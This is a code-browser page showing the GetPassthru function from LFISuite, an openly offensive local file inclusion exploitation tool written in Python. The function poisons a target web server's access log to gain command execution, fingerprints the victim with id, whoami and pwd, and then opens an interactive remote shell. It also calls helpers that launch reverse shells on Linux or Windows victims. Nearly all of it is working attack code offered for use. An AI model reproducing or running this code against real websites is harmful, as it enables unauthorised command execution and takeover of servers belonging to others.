MCPcopy
hub / github.com/D35m0nd142/LFISuite / GetPassthru

Function GetPassthru

lfisuite.py:1079–1136  ·  view source on GitHub ↗
(ologurl, logmain)

Source from the content-addressed store, hash-verified

1077 return passthru_ext(resp,start_get)
1078
1079def GetPassthru(ologurl, logmain):
1080 global victimOs
1081
1082 print colored("\nTrying to inject the website using GET 'passthru' requests.", "white")
1083 rand_str = generateRandom()
1084 url = "%s&cmd=echo %s" %(ologurl,rand_str)
1085 resp = (requests.get(url,headers=gen_headers,timeout=20, verify=False)).text
1086 vuln_count_before = len(SubstrFind(resp,"GET /%s" %rand_str))
1087
1088 send_passthru_req(logmain)
1089 r = requests.get(url,headers=gen_headers,timeout=20, verify=False)
1090 resp = r.text
1091 vulns = SubstrFind(resp,"GET /%s" %rand_str)
1092 vuln_count_after = len(vulns)
1093
1094 try:
1095 start = vulns[len(vulns)-1]
1096 except:
1097 return
1098
1099 if(vuln_count_after > vuln_count_before):
1100 print "\n[+] The website seems to be vulnerable. Opening a System Shell..\n"
1101 resp = resp[:start]
1102 got = SubstrFind(resp,"GET /")
1103 start_get = len(got)+1
1104
1105 uid = cleanOutput(send_passthru_cmd(ologurl,"id",start_get),True)
1106 if("uid=" not in uid and "Usage of id by " not in uid):
1107 # check if Windows operating system
1108 path = cleanOutput(send_passthru_cmd(ologurl,"path",start_get),True)
1109 if(checkIfWindows(path)):
1110 victimOs = "Windows"
1111
1112 whoami = isUnknown(cleanOutput(send_passthru_cmd(ologurl,"whoami",start_get),True))
1113 pwd = ""
1114
1115 if(victimOs == "Windows"):
1116 pwd = cleanOutput(send_passthru_cmd(ologurl,"cd",start_get),True)
1117 else:
1118 pwd = cleanOutput(send_passthru_cmd(ologurl,"pwd",start_get),True)
1119
1120 shell = "%s@%s:%s$ " %(whoami, logmain, pwd)
1121 shell.replace(' ','')
1122
1123 cmd = ""
1124 while(cmd != "exit" and cmd != "quit"):
1125 cmd = raw_input("%s" %shell)
1126 cmd = cmd.replace("'","\"")
1127 if(cmd != "exit" and cmd != "quit"):
1128 if(checkIfReverseShell(cmd)):
1129 if(victimOs != "Windows"):
1130 passthru_reverse_shell(ologurl,start_get)
1131 else:
1132 windows_passthru_reverse_shell(ologurl,start_get)
1133 else:
1134 print cleanOutput(send_passthru_cmd(ologurl,cmd,start_get),False)
1135 print ""
1136 exit()

Callers 1

run_access_logFunction · 0.85

Calls 11

generateRandomFunction · 0.85
SubstrFindFunction · 0.85
send_passthru_reqFunction · 0.85
cleanOutputFunction · 0.85
send_passthru_cmdFunction · 0.85
checkIfWindowsFunction · 0.85
isUnknownFunction · 0.85
checkIfReverseShellFunction · 0.85
passthru_reverse_shellFunction · 0.85
exitFunction · 0.85

Tested by

no test coverage detected